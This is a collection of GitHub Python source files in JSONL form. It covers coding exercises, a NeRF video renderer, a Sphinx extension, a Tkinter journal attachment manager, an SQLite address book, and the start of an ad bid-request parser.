+{"seq_id":"29725464295","text":"def solution(N: int, A: list):\n max_val, tmp_max = 0, 0\n result = [0] * N\n for item in A:\n if item > N:\n max_val = tmp_max\n else:\n if result[item - 1] < max_val:\n result[item - 1] = max_val + 1\n else:\n result[item - 1] += 1\n tmp_max = max(tmp_max, result[item - 1])\n for idx in range(len(result)):\n if result[idx] < max_val:\n result[idx] = max_val\n return result\n\n\nA = [3, 4, 4, 6, 1, 4, 4]\nN = 5\nassert solution(N, A) == [3, 2, 2, 4, 2]\n","repo_name":"Dopiz/Codility-Lessons","sub_path":"Lesson 4 - MaxCounters.py","file_name":"Lesson 4 - MaxCounters.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30061114472","text":"#Ask the user for their name and save as variable name\r\nname = input(\"What is your name?\")\r\n\r\n#Check if their name is frank or george\r\nif name == \"frank\" or name == \"george\":\r\n\r\n #say hello\r\n print(\"Hello\" + \" \" + name)\r\n\r\n#if their name is not frank or george\r\nelse:\r\n\r\n #Say no\r\n print(\"Sorry, you cannot access the system\")","repo_name":"HBlack09/ICTPRG-Python","sub_path":"Introduction to Selection Quiz/Question 1.py","file_name":"Question 1.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27909999544","text":"import imageio\r\n\r\n# models\r\nfrom models import *\r\nfrom renderer import *\r\nfrom data.ray_utils import get_rays\r\nfrom scipy.spatial.transform import Rotation as R\r\n\r\nfrom tqdm import tqdm\r\n\r\n# pytorch-lightning\r\n\r\nfrom data.ray_utils import ray_marcher\r\nfrom data.llff import LLFFDataset\r\n\r\ntorch.cuda.set_device(0)\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\n\r\n\r\ndef decode_batch(batch):\r\n rays = batch['rays'] # (B, 8)\r\n rgbs = batch['rgbs'] # (B, 3)\r\n return rays, rgbs\r\n\r\n\r\ndef unpreprocess(data, shape=(1, 1, 3, 1, 1)):\r\n # to unnormalize image for visualization\r\n # data N V C H W\r\n device = data.device\r\n mean = torch.tensor([-0.485 / 0.229, -0.456 / 0.224, -0.406 / 0.225]).view(*shape).to(device)\r\n std = torch.tensor([1 / 0.229, 1 / 0.224, 1 / 0.225]).view(*shape).to(device)\r\n\r\n return (data - mean) / std\r\n\r\n\r\ndef normalize(x):\r\n return x / np.linalg.norm(x, axis=-1, keepdims=True)\r\n\r\n\r\ndef viewmatrix(z, up, pos):\r\n vec2 = normalize(z)\r\n vec1_avg = up\r\n vec0 = normalize(np.cross(vec1_avg, vec2))\r\n vec1 = normalize(np.cross(vec2, vec0))\r\n m = np.eye(4)\r\n m[:3] = np.stack([vec0, vec1, vec2, pos], 1)\r\n return m\r\n\r\n\r\ndef ptstocam(pts, c2w):\r\n tt = np.matmul(c2w[:3, :3].T, (pts - c2w[:3, 3])[..., np.newaxis])[..., 0]\r\n return tt\r\n\r\n\r\ndef poses_avg(poses):\r\n center = poses[:, :3, 3].mean(0)\r\n vec2 = normalize(poses[:, :3, 2].sum(0))\r\n up = poses[:, :3, 1].sum(0)\r\n c2w = viewmatrix(vec2, up, center)\r\n\r\n return c2w\r\n\r\n\r\ndef render_path_spiral(c2w, up, rads, focal, zdelta, zrate, N_rots=2, N=120):\r\n render_poses = []\r\n rads = np.array(list(rads) + [1.])\r\n\r\n for theta in np.linspace(0., 2. * np.pi * N_rots, N + 1)[:-1]:\r\n c = np.dot(c2w[:3, :4], np.array([np.cos(theta), -np.sin(theta), -np.sin(theta * zrate), 1.]) * rads)\r\n z = normalize(c - np.dot(c2w[:3, :4], np.array([0, 0, -focal, 1.])))\r\n render_poses.append(viewmatrix(z, up, c))\r\n return render_poses\r\n\r\n\r\ndef get_spiral(c2ws_all, near_far, rads_scale=0.5, N_views=120):\r\n # center pose\r\n c2w = poses_avg(c2ws_all)\r\n\r\n # Get average pose\r\n up = normalize(c2ws_all[:, :3, 1].sum(0))\r\n\r\n # Find a reasonable \"focus depth\" for this dataset\r\n close_depth, inf_depth = near_far\r\n dt = .75\r\n mean_dz = 1. / (((1. 
- dt) / close_depth + dt / inf_depth))\r\n focal = mean_dz\r\n\r\n # Get radii for spiral path\r\n zdelta = close_depth * .2\r\n tt = c2ws_all[:, :3, 3] - c2w[:3, 3][None]\r\n rads = np.percentile(np.abs(tt), 70, 0) * rads_scale\r\n render_poses = render_path_spiral(c2w, up, rads, focal, zdelta, zrate=.5, N=N_views)\r\n return np.stack(render_poses)\r\n\r\n\r\ndef position2angle(position):\r\n ''' nx3 '''\r\n position = normalize(position)\r\n theta = np.arccos(position[:, 2]) / np.pi * 180\r\n phi = np.arctan2(position[:, 1], position[:, 0]) / np.pi * 180\r\n return [theta, phi]\r\n\r\n\r\ndef pose_spherical_nerf(euler, radius=4.0):\r\n c2ws_render = np.eye(4)\r\n c2ws_render[:3, :3] = R.from_euler('xyz', euler, degrees=True).as_matrix()\r\n c2ws_render[:3, 3] = c2ws_render[:3, :3] @ np.array([0.0, 0.0, -radius])\r\n return c2ws_render\r\n\r\n\r\ndef nerf_video_path(c2ws, theta_range=10, phi_range=20, N_views=120):\r\n rotvec = []\r\n for i in range(c2ws.shape[0]):\r\n r = R.from_matrix(c2ws[i, :3, :3])\r\n euler_ange = r.as_euler('xyz', degrees=True).reshape(1, 3)\r\n if i:\r\n mask = np.abs(euler_ange - rotvec[0]) > 180\r\n euler_ange[mask] += 360.0\r\n rotvec.append(euler_ange)\r\n rotvec = np.mean(np.stack(rotvec), axis=0)\r\n render_poses = [pose_spherical_nerf(rotvec + np.array([angle, 0.0, -phi_range]), 4.0) for angle in\r\n np.linspace(-theta_range, theta_range, N_views // 4, endpoint=False)]\r\n render_poses += [pose_spherical_nerf(rotvec + np.array([theta_range, 0.0, angle]), 4.0) for angle in\r\n np.linspace(-phi_range, phi_range, N_views // 4, endpoint=False)]\r\n render_poses += [pose_spherical_nerf(rotvec + np.array([angle, 0.0, phi_range]), 4.0) for angle in\r\n np.linspace(theta_range, -theta_range, N_views // 4, endpoint=False)]\r\n render_poses += [pose_spherical_nerf(rotvec + np.array([-theta_range, 0.0, angle]), 4.0) for angle in\r\n np.linspace(phi_range, -phi_range, N_views // 4, endpoint=False)]\r\n render_poses = torch.from_numpy(np.stack(render_poses)).float().to(device)\r\n return render_poses\r\n\r\ndef render_video(args):\r\n for i_scene, scene in enumerate([args.datadir.split('/')[-1]]):\r\n if args.is_finetuned:\r\n args.ckpt = f'./runs_fine_tuning/{scene}/ckpts/latest.tar'\r\n args.video_name = 'DSft_'\r\n else:\r\n args.video_name = ''\r\n\r\n args.use_viewdirs = True\r\n args.feat_dim = 8 + 3 * 4\r\n\r\n # create models\r\n if i_scene == 0 or args.is_finetuned:\r\n # Create nerf model\r\n render_kwargs_train, render_kwargs_test, start, grad_vars = \\\r\n create_nerf_mvs(args, use_mvs=True, dir_embedder=False, pts_embedder=True)\r\n filter_keys(render_kwargs_train)\r\n # Create mvs model\r\n MVSNet = render_kwargs_train['network_mvs']\r\n render_kwargs_train.pop('network_mvs')\r\n\r\n datatype = 'val'\r\n pad = 24 # the padding value should be same as your finetuning ckpt\r\n args.chunk = 5120\r\n\r\n dataset = LLFFDataset(args, split=datatype)\r\n\r\n save_dir = f'./results'\r\n os.makedirs(save_dir, exist_ok=True)\r\n MVSNet.train()\r\n MVSNet = MVSNet.cuda()\r\n\r\n with torch.no_grad():\r\n\r\n c2ws_all = dataset.poses\r\n\r\n if args.is_finetuned:\r\n # large baseline\r\n imgs_source, proj_mats, near_far_source, pose_source = dataset.read_source_views(device=device)\r\n volume_feature = torch.load(args.ckpt)['volume']['feat_volume']\r\n volume_feature = RefVolume(volume_feature.detach()).cuda()\r\n\r\n pad *= args.imgScale_test\r\n pair_idx = torch.load('configs/pairs.th')[f'{scene}_train']\r\n c2ws_render = get_spiral(c2ws_all[pair_idx], 
near_far_source, rads_scale=0.6,\r\n N_views=180) # you can enlarge the rads_scale if you want to render larger baseline\r\n else:\r\n # neighboring views with position distance\r\n imgs_source, proj_mats, near_far_source, pose_source = dataset.read_source_views(device=device)\r\n volume_feature, _, _ = MVSNet(imgs_source, proj_mats, near_far_source, pad=pad, lindisp=args.use_disp)\r\n\r\n pad *= args.imgScale_test\r\n pair_idx = torch.load('configs/pairs.th')[f'{scene}_train']\r\n c2ws_render = get_spiral(c2ws_all[pair_idx], near_far_source, rads_scale=0.6,\r\n N_views=180) # you can enlarge the rads_scale if you want to render larger baseline\r\n\r\n c2ws_render = torch.from_numpy(np.stack(c2ws_render)).float().to(device)\r\n\r\n imgs_source = unpreprocess(imgs_source)\r\n\r\n try:\r\n tqdm._instances.clear()\r\n except Exception:\r\n pass\r\n\r\n frames = []\r\n img_directions = dataset.directions.to(device)\r\n for i, c2w in enumerate(tqdm(c2ws_render)):\r\n torch.cuda.empty_cache()\r\n\r\n rays_o, rays_d = get_rays(img_directions, c2w) # both (h*w, 3)\r\n rays = torch.cat([rays_o, rays_d,\r\n near_far_source[0] * torch.ones_like(rays_o[:, :1]),\r\n near_far_source[1] * torch.ones_like(rays_o[:, :1])],\r\n 1).to(device) # (H*W, 3)\r\n\r\n N_rays_all = rays.shape[0]\r\n rgb_rays, depth_rays_preds = [], []\r\n for chunk_idx in range(N_rays_all // args.chunk + int(N_rays_all % args.chunk > 0)):\r\n xyz_coarse_sampled, rays_o, rays_d, z_vals = ray_marcher(\r\n rays[chunk_idx * args.chunk:(chunk_idx + 1) * args.chunk],\r\n N_samples=args.N_samples, lindisp=args.use_disp)\r\n\r\n # Converting world coordinate to ndc coordinate\r\n H, W = imgs_source.shape[-2:]\r\n inv_scale = torch.tensor([W - 1, H - 1]).to(device)\r\n w2c_ref, intrinsic_ref = pose_source['w2cs'][0], pose_source['intrinsics'][0].clone()\r\n xyz_NDC = get_ndc_coordinate(w2c_ref, intrinsic_ref, xyz_coarse_sampled, inv_scale,\r\n near=near_far_source[0], far=near_far_source[1], pad=pad,\r\n lindisp=args.use_disp)\r\n\r\n # rendering\r\n rgb, disp, acc, depth_pred, alpha, extras = rendering(args, pose_source, xyz_coarse_sampled,\r\n xyz_NDC, z_vals, rays_o, rays_d,\r\n volume_feature, imgs_source,\r\n **render_kwargs_train)\r\n\r\n rgb, depth_pred = torch.clamp(rgb.cpu(), 0, 1.0).numpy(), depth_pred.cpu().numpy()\r\n rgb_rays.append(rgb)\r\n depth_rays_preds.append(depth_pred)\r\n\r\n depth_rays_preds = np.concatenate(depth_rays_preds).reshape(H, W)\r\n depth_rays_preds, _ = visualize_depth_numpy(depth_rays_preds, near_far_source)\r\n\r\n rgb_rays = np.concatenate(rgb_rays).reshape(H, W, 3)\r\n H_crop, W_crop = np.array(rgb_rays.shape[:2]) // 20\r\n rgb_rays = rgb_rays[H_crop:-H_crop, W_crop:-W_crop]\r\n depth_rays_preds = depth_rays_preds[H_crop:-H_crop, W_crop:-W_crop]\r\n img_vis = np.concatenate((rgb_rays * 255, depth_rays_preds), axis=1)\r\n\r\n frames.append(img_vis.astype('uint8'))\r\n\r\n imageio.mimwrite(f'{save_dir}/{args.video_name}{scene}.mov', np.stack(frames), fps=30, quality=10)\r\n os.system(f\"ffmpeg -i {save_dir}/{args.video_name}{scene}.mov -vcodec h264 -acodec mp2 {save_dir}/{args.video_name}{scene}.mp4\")\r\n os.system(f\"rm {save_dir}/{args.video_name}{scene}.mov\")\r\n\r\n","repo_name":"Yuchen-Song/DS-MVSNeRF","sub_path":"render_video.py","file_name":"render_video.py","file_ext":"py","file_size_in_byte":10482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19326058906","text":"import os\nfrom docutils import nodes\nfrom docutils.statemachine import ViewList\nfrom sphinx.util.docutils import SphinxDirective\nfrom sphinx.util.nodes import nested_parse_with_titles\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nwith open('{}/example.rst.tmpl'.format(dir_path), 'r') as f:\n lines = f.readlines()\n\n\ndef make_example(dir):\n path = '../../examples/{0}/{0}'.format(dir)\n rst = ViewList()\n line_no = 0\n for line in lines:\n line_no += 1\n line = line.format(path).rstrip()\n rst.append(line, 'example.rst', line_no)\n return rst\n\n\nclass ExampleDirective(SphinxDirective):\n has_content = True\n\n def run(self):\n dir = self.content[0]\n rst = make_example(dir)\n node = nodes.section()\n node.document = self.state.document\n nested_parse_with_titles(self.state, rst, node)\n return node.children\n\n\ndef setup(app):\n app.add_directive('example', ExampleDirective)\n return {\n 'parallel_read_safe': True,\n 'parallel_write_safe': True,\n }\n","repo_name":"udondan/iam-floyd","sub_path":"docs/source/extensions/example/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":524,"dataset":"github-code","pt":"53"}
+{"seq_id":"9662906338","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 14 13:22:32 2017\n\n@author: Kozmik\n\"\"\"\n\nimport DateTools as DT\nfrom os.path import abspath\nfrom os.path import exists\nfrom os.path import join\nfrom os import listdir\nfrom os import rename\nfrom os import mkdir\nfrom os import remove\nfrom os import rmdir\nfrom shutil import copy\nfrom subprocess import Popen\nimport PIL.Image as PI\nfrom PIL import ImageTk\nfrom tkinter import filedialog as filedialog\nfrom tkinter import messagebox as messagebox\nimport tkinter as tk\nimport tkinter.ttk as ttk\n\nclass AttachmentManager(tk.Frame):\n def __init__(self, master, controller, jobject, jentry, **kw):\n self.master = master\n self.controller = controller\n self.journal = jobject\n self.entry = jentry\n self.args = kw\n self.all_attachments = []\n self.dialog = None\n self.frame = None\n self.DELETE = None\n self.buttonlist = None\n self.delete_icon = None\n \n self.trashcan = join(self.args['homepath'], 'Resources\\\\Trash_Can-512.png')\n self.app_icon = join(self.args['homepath'], 'Resources\\\\web.ico')\n self.parentpath = join(self.args['homepath'], 'Attachments\\\\') \n try:\n mkdir(self.parentpath)\n except FileExistsError:\n pass\n self.temppath = self.parentpath + 'temp\\\\'\n self.currentpath = self.temppath\n# try:\n# mkdir(self.currentpath)\n# except FileExistsError:\n if exists(abspath(self.currentpath)):\n self.delete()\n \n ttk.Frame.__init__(self, self.master)\n self.NEW = ttk.Button(self, takefocus=0, style='UI.TButton', \n text='Add Attachment', \n command=self.askForAttachment)\n self.DISPLAY = ttk.Button(self, takefocus=0, style='UI.TButton', \n text='Display Attachments', \n command=self.displayAttachments, \n state=tk.DISABLED)\n self.NEW.pack(fill=tk.X)\n self.DISPLAY.pack(fill=tk.X)\n \n def updateGUI(self, jentry):\n \"\"\"Checks to see if the current JEntry has attachments and aligns variables, if so.\n Has exclusive control to generation of 'temp' folder.\"\"\"\n self.all_attachments = []\n if exists(self.temppath):\n self.current = self.temppath\n self.delete()\n self.DISPLAY.config(state=tk.DISABLED)\n self.entry = jentry\n date = self.entry.getDate()\n if date:\n attachments = self.entry.getAttachments()\n path = self.parentpath + DT.getDateFileStorageFormat(date) + '\\\\'\n filepath = exists(path)\n if not attachments and not filepath:\n self.currentpath = self.temppath\n mkdir(self.currentpath)\n elif attachments and not filepath:\n message = 'The directory for this journal entry could not be ' +\\\n 'located. Do you want the application to create a new ' +\\\n 'directory with a list of the missing files?'\n# if len(attachments) > 1:\n# message = 'The directory for this journal entry could ' +\\\n# 'not be located. The following attachments are missing: '\n# message += attachments[0] + '. Do you want to restore them?'\n# for item in range(1, len(attachments)):\n# message += ', ' + attachments[item]\n# else:\n# message = 'The directory for this journal entry could ' +\\\n# 'not be located. The following attachment is missing: '\n# message += attachments[0] + '. 
Do you want to restore it?'\n choice = messagebox.askyesno(title='Missing Directory', \n message=message)\n if choice:\n self.currentpath = path\n mkdir(self.currentpath)\n# self.askForAttachment()\n path = join(self.currentpath, 'Missing Files.txt')\n file = open(path, 'w+')\n for item in attachments:\n file.write(item + '\\n\\n')\n file.close()\n# message = 'The list of missing files can be found at:\\n\\n' +\\\n# self.currentpath\n# messagebox.showinfo()\n Popen(r'explorer /select, ' + '\"\"' + path + '\"\"')\n else:\n for item in attachments:\n self.entry.deleteAttachment(item)\n self.currentpath = self.temppath\n mkdir(self.currentpath)\n self.DISPLAY.config(state=tk.DISABLED)\n else:\n self.currentpath = path\n check = self.scanForAdditions()\n if check:\n attachments = self.entry.getAttachments()\n self.DISPLAY.config(state=tk.NORMAL)\n for filename in attachments:\n self.all_attachments.append(self.currentpath + \n filename)\n else:\n self.currentpath = self.temppath\n self.DISPLAY.config(state=tk.DISABLED)\n mkdir(self.currentpath) \n \n def addAttachment(self, pathtuple):\n for filepath in pathtuple:\n filepath = filepath.replace('/', '\\\\')\n if filepath not in self.all_attachments:\n self.all_attachments.append(filepath)\n copy(filepath, self.currentpath)\n# folder = listdir(self.currentpath)\n# entry = self.entry.getAttachments()\n# for file in folder:\n# if file not in entry:\n# self.entry.addAttachment(file)\n self.DISPLAY.config(state=tk.NORMAL)\n \n def askForAttachment(self):\n options = {}\n options['initialdir'] = self.currentpath\n options['parent'] = self.controller\n options['title'] = 'Select a file to add'\n items = filedialog.askopenfilenames(**options)\n if items:\n self.addAttachment(items)\n \n def scanForAdditions(self):\n \"\"\"[For later.] 
Allows manual addition of attachments that will be added \n to associated folder upon opening the JEntry.\"\"\"\n new = listdir(self.currentpath)\n old = self.entry.getAttachments()\n if old != new:\n for item in new:\n if item not in old:\n self.entry.addAttachment(item)\n return True\n else:\n return False\n# self.updateGUI(self.entry)\n \n def displayAttachments(self):\n self.buttonlist = []\n \n if self.all_attachments:\n self.dialog = tk.Toplevel(bg=self.args['bgcolor1'])\n self.dialog.title('Attachments')\n self.dialog.iconbitmap(self.app_icon)\n self.dialog.maxsize(width=self.dialog.winfo_screenwidth(), \n height=self.dialog.winfo_screenheight())\n self.dialog.minsize(width=250, height=70)\n \n self.frame = ttk.Frame(self.dialog)\n bottomframe = ttk.Frame(self.dialog)\n \n for filepath in self.all_attachments:\n path = abspath(filepath)\n command = r'explorer /select, ' + '\"\"' + path + '\"\"'\n button = ttk.Button(self.frame, style='UI.TButton', \n text=filepath.rsplit('\\\\', 1)[1], \n command=lambda c=command: Popen(c))\n self.buttonlist.append([button, \n tk.BooleanVar(self.frame, False, \n button.cget('text')), \n path])\n button.pack(expand=1, fill='x', pady=2)\n self.DELETE = ttk.Button(bottomframe, takefocus=0, \n style='Bold.UI.TButton', \n text='Delete', \n command=self.deleteAttachment)\n self.DELETE.pack(side='right', expand=True, fill='x')\n self.frame.pack(side='top')\n bottomframe.pack(side='top', pady=4)\n self.dialog.grab_set()\n \n self.dialog.protocol('WM_DELETE_WINDOW', self.destroyDialog)\n \n else:\n message = \"There are no attachments for this entry!\"\n messagebox.showinfo(title='Attachments', message=message)\n \n def deleteAttachment(self):\n for item in self.frame.pack_slaves():\n item.pack_forget()\n self.dialog.title('Delete')\n \n for item in self.buttonlist:\n checkbutton = ttk.Checkbutton(self.frame, \n text=item[0].cget('text'), \n var=item[1])\n checkbutton.pack(side=tk.TOP, expand=True, fill=tk.X, pady=2)\n \n w = self.DELETE.winfo_width()\n h = self.DELETE.winfo_height()\n if not self.delete_icon:\n# iconpath = self.parentpath.rsplit('\\\\Attachments',1)[0] + \\\n# '\\\\Resources\\\\Trash_Can-512.png'\n self.delete_icon = PI.open(self.trashcan)\n self.delete_icon.thumbnail((h-2,h-2))\n self.delete_icon = ImageTk.PhotoImage(self.delete_icon)\n self.DELETE.config(command=self.refreshDialog, text='', \n image=self.delete_icon, width=w)\n self.DELETE.pack()\n\n def delete(self):\n \"\"\"Deletes the folder associated with the entry.\"\"\"\n try:\n items = listdir(self.currentpath)\n for item in items:\n remove(self.currentpath + item)\n rmdir(self.currentpath)\n except FileNotFoundError:\n pass\n \n def refreshDialog(self):\n deletelist = []\n for i in range(len(self.buttonlist)):\n button = self.buttonlist[i]\n if button[1].get():\n deletelist.append(i)\n if deletelist:\n if len(deletelist) > 1:\n message = \"This will delete previously saved attachments from your journal storage.\"\\\n \" If you want to keep any of the attachments, press \\\"Cancel\\\" and copy \"\\\n \"them elsewhere. Then, return here to finish deleting.\\n\\n\"\\\n \"Are you sure you want to delete them?\"\n else:\n message = \"This will delete the selected attachment from your \"\\\n \"computer. If you want to keep the attachment, press \\\"Cancel\\\" \"\\\n \"and copy the attachment elsewhere. 
Then, return here to \"\\\n \"delete it.\\n\\n Are you sure you want to delete it?\"\n choice = messagebox.askokcancel(title='Are You Sure?', message=message)\n if choice:\n for d in deletelist:\n path = self.buttonlist[d][2]\n# filename = self.buttonlist[d][0].cget('text')\n# filepath = abspath(self.currentpath+filename)\n# if filepath == self.buttonlist[d][2]:\n# try:\n# remove(filepath)\n# except FileNotFoundError:\n# pass\n# if filepath in self.old_attachments:\n# self.old_attachments.remove(filepath)\n# else:\n# filepath = self.buttonlist[d][2]\n# if filepath in self.new_attachments:\n# self.new_attachments.remove(filepath)\n try:\n remove(path)\n except FileNotFoundError:\n pass\n self.entry.deleteAttachment(filename = \n self.buttonlist[d][0].cget('text'))\n self.all_attachments.remove(path)\n self.destroyDialog()\n \n def destroyDialog(self):\n self.dialog.destroy()\n self.dialog = None\n self.frame = None\n for item in self.buttonlist:\n item[0].destroy()\n self.buttonlist = None\n if not self.all_attachments:\n self.delete()\n self.updateGUI(self.entry)\n# self.DISPLAY.config(state=tk.DISABLED)\n# rmdir(self.currentpath)\n \n def clearGUI(self, jentry):\n self.entry = jentry\n self.all_attachments = []\n self.currentpath = self.temppath\n self.delete()\n# mkdir(self.currentpath)\n# self.new_attachments = []\n \n def save(self):\n \"\"\"Saves the attachments and renames the 'temp' folder to the date.\n Has exclusive control over generation of JEntry-associated folders.\n Assumes that the JEntry object already has a date\"\"\"\n src = self.temppath\n date = self.entry.getDate()\n dest = self.parentpath + DT.getDateFileStorageFormat(date)\n# tmp = False\n old = self.entry.getAttachments()\n# if not old:\n if exists(src):\n# tmp = True\n new = listdir(src)\n if new:\n for item in new:\n if item not in old:\n self.entry.addAttachment(item)\n rename(src, dest)\n else:\n folder = listdir(dest)\n for file in folder:\n if file not in old:\n self.entry.addAttachment(file)\n# self.delete()\n# src = self.currentpath\n# if new and tmp:\n \n# if self.all_attachments:\n# try:\n# mkdir(path)\n# except FileExistsError:\n# pass\n# for filepath in self.new_attachments:\n# copy(filepath, path)\n# f = filepath.rsplit('\\\\',1)[1]\n# self.entry.addAttachment(f)\n# tmp = self.entry.getAttachments()\n# self.old_attachments = []\n# for filename in tmp:\n# self.old_attachments.append(self.currentpath+filename) \n# self.new_attachments = []\n\n def clean(self):\n self.currentpath = self.temppath\n if exists(self.currentpath):\n check = listdir(self.currentpath)\n if check:\n message = 'There are files left in ' + self.currentpath + '. If you wish to '\\\n 'move them, do so before clicking \\\"OKAY\\\".'\n messagebox.showwarning(title='Unsaved files', message=message)\n self.delete()","repo_name":"kozmik-moore/kunnekted-jurnl","sub_path":"AttachmentTools.py","file_name":"AttachmentTools.py","file_ext":"py","file_size_in_byte":14922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70636061610","text":"#factorial\r\ndef fact(n):\r\n f=1\r\n for i in range(1,n+1):\r\n f*=i\r\n return f\r\n\r\nn=int(input())\r\nr=int(input())\r\n\r\nn_fact=fact(n)\r\nr_fact=fact(r)\r\nnr_fact=fact((n-r))\r\nc=n_fact//(r_fact*nr_fact)\r\nprint(c)\r\n\r\n #prime no\r\ndef isprime(n):\r\n for i in range(2,n):\r\n if n%i==0:\r\n break\r\n else:\r\n return True\r\n return False\r\n\r\nn=int(input())\r\na=isprime(n)\r\nif a:\r\n print(\"Prime\")\r\nelse:\r\n print(\"Not Prime\")\r\n\r\n#all prime no b/w 2 to n\r\nn=int(input())\r\nfor i in range(2,n+1):\r\n a=isprime(i)\r\n if a:\r\n print(i,\" Prime\")\r\n else:\r\n print(i,\" Not Prime\")\r\n\r\n\r\n#prime in range 2 to n\r\ndef isprimerange(n):\r\n for i in range(2,n+1):\r\n for j in range(2,i):\r\n if i%j==0:\r\n break\r\n else:\r\n print(i)\r\n\r\nn=int(input())\r\nisprimerange(n)\r\n\r\n\r\n#prime in range 2 to n\r\ndef isprime(n):\r\n for i in range(2,n):\r\n if n%i==0:\r\n break\r\n else:\r\n return True\r\n return False\r\n\r\ndef isprimerange(n):\r\n for i in range(2,n+1):\r\n a=isprime(i)\r\n if a:\r\n print(i)\r\n\r\nn=int(input())\r\nisprimerange(n)","repo_name":"AbhisheKumar1616/Introduction-to-Python","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"36424990103","text":"\"\"\" Python modules\n logging: logs\n geodesic: distance between 2 points\n\"\"\"\nimport logging\nimport sqlite3\nfrom geopy.distance import geodesic\n\n\nfrom src.db_connection import database_connection_cursor\n\nlogging.basicConfig(level=logging.INFO, filename=\"logs/db_connection.log\",\n format=\" %(asctime)s - %(levelname)s - %(message)s\")\n\n\n# Connecting database and receiving conn and cursor object\ndb_conn, db_curr = database_connection_cursor()\n\n\nclass Address:\n \"\"\"\n Address class for UserAddress\n \"\"\"\n def __init__(self, address_name=None, coordinates=None):\n self.address_name = address_name\n self.coordinates = coordinates\n\n def create_address(self):\n \"\"\"\n Method to create/add address into Database\n Error Convention:\n 1500: same address_name\n \"\"\"\n\n addrs = set()\n ids = self.get_address_ids()\n for addr in ids:\n addrs.add(addr[0])\n if self.address_name in addrs:\n return 1500\n\n del addrs\n\n query = f\"\"\" INSERT INTO address_book VALUES\n ('{self.address_name}','{self.coordinates}')\"\"\"\n\n try:\n logging.info(db_curr.execute(query))\n except sqlite3.Error as err:\n logging.error(err)\n\n self.commit()\n\n return True\n\n def delete_address(self, query_address_name):\n \"\"\"Method to delete a address in the DB by name\n \"\"\"\n addrs = set()\n ids = self.get_address_ids()\n\n for addr in ids:\n addrs.add(addr[0])\n\n if query_address_name not in addrs:\n return False\n del addrs\n\n query = f\"\"\"\n DELETE FROM address_book WHERE\n address_name ='{query_address_name}';\n \"\"\"\n try:\n db_curr.execute(query)\n self.commit()\n return True\n except sqlite3.Error as err:\n logging.error(err)\n\n def update_address(self):\n \"\"\"Method to update a address in the DB\n \"\"\"\n addrs = set()\n ids = self.get_address_ids()\n for addr in ids:\n addrs.add(addr[0])\n\n if self.address_name not in addrs:\n return 1500\n\n del addrs\n query = f\"\"\"\n UPDATE address_book\n SET coordinates = '{self.coordinates}'\n WHERE address_name = '{self.address_name}';\n \"\"\"\n\n try:\n logging.info(db_curr.execute(query))\n\n except sqlite3.Error as err:\n logging.error(err)\n\n self.commit()\n\n return True\n\n def get_address_in_range(self, rang, location):\n \"\"\"\n Method to get the addresses within the given distance\n and location from sqlite database\n\n \"\"\"\n location = location.split(\",\")\n latitude = float(location[0].strip())\n longitude = float(location[1].strip())\n\n point = (latitude, longitude)\n\n addresses_within_range = []\n all_addresses = self.get_address_ids()\n\n for address in all_addresses:\n address_point = address[1].split(\",\")\n address_point = (float(address_point[0]), float(address_point[1]))\n\n diff = geodesic(point, address_point)\n logging.info(f\"Location:{location}\")\n logging.info(f\"Address point: {address_point} -- \\\n Range:{range} -- Difference: {diff}\")\n\n if diff <= rang:\n addresses_within_range.append(address)\n\n return addresses_within_range\n\n @staticmethod\n def commit():\n \"\"\"\n Method to commit the changes done on the database\n\n \"\"\"\n db_conn.commit()\n\n @staticmethod\n def close():\n \"\"\"\n Method to close the database connection\n \"\"\"\n db_conn.close()\n\n @staticmethod\n def get_address_ids():\n \"\"\"\n Method to get all the address names present in the DB\n \"\"\"\n try:\n db_curr.execute(\"\"\"SELECT address_name, coordinates\n FROM address_book;\"\"\")\n rows = db_curr.fetchall()\n return rows\n except sqlite3.Error as err:\n 
logging.error(err)\n","repo_name":"mallik18/AddressBook","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31171169831","text":"def ficha(nome='', gol=0,):\n print( f'O jogador {nome} fez {gol} gol(s) no campeonato.')\n\n\nnomeJogador = str(input('Nome do jogador: '))\nnumGols = str(input('Número de gols: '))\nif numGols.isnumeric():\n numGols = int(numGols)\nelse:\n numGols = 0\nif nomeJogador.strip() == '':\n ficha(gol=numGols)\nelse:\n ficha(nomeJogador, numGols)\n","repo_name":"Nadirlene/Exercicios-python","sub_path":"Exerciciospython2/Função 02/e103.py","file_name":"e103.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6334152351","text":"\"\"\"\nDefine the method to parse variables \"bidderid\", \"verticalid\", \"bidfloor\", \"format\", \"product\", \"w\", and \"h\"\n\"\"\"\n\nimport Shared as sd\n\nformats_ = [16, 31, 9, 12, 14, 3, 2, 7, 5, 21, 8, 20, 15, 6, 22, 27, 25, 26, 30, 13, 23]\n\n# (\"w\", \"h\") is set to (-1, -1) to indicate missing banners\nbanners_ = [(300, 250), (728, 90), (160, 600), (320, 50), (300, 600), (970, 90), (468, 60), (234, 60),\n (13, 13), (12, 12), (17, 17), (18, 18), (10, 10), (300, 120), (16, 16), (250, 100), (19, 19), (320, 480),\n (250, 70), (0, 0), (450, 100), (21, 21), (20, 20), (400, 400), (300, 100), (-1, -1)]\n\n\ndef process(margin, entry, result, mode):\n \"\"\"\n Given a JSON object formatted by Extractor.py, parse variables \"bidderid\", \"verticalid\", \"bidfloor\", \"format\", \"product\", \"w\", and \"h\",\n and the results to the list of possible results.\n :param entry: the JSON object that 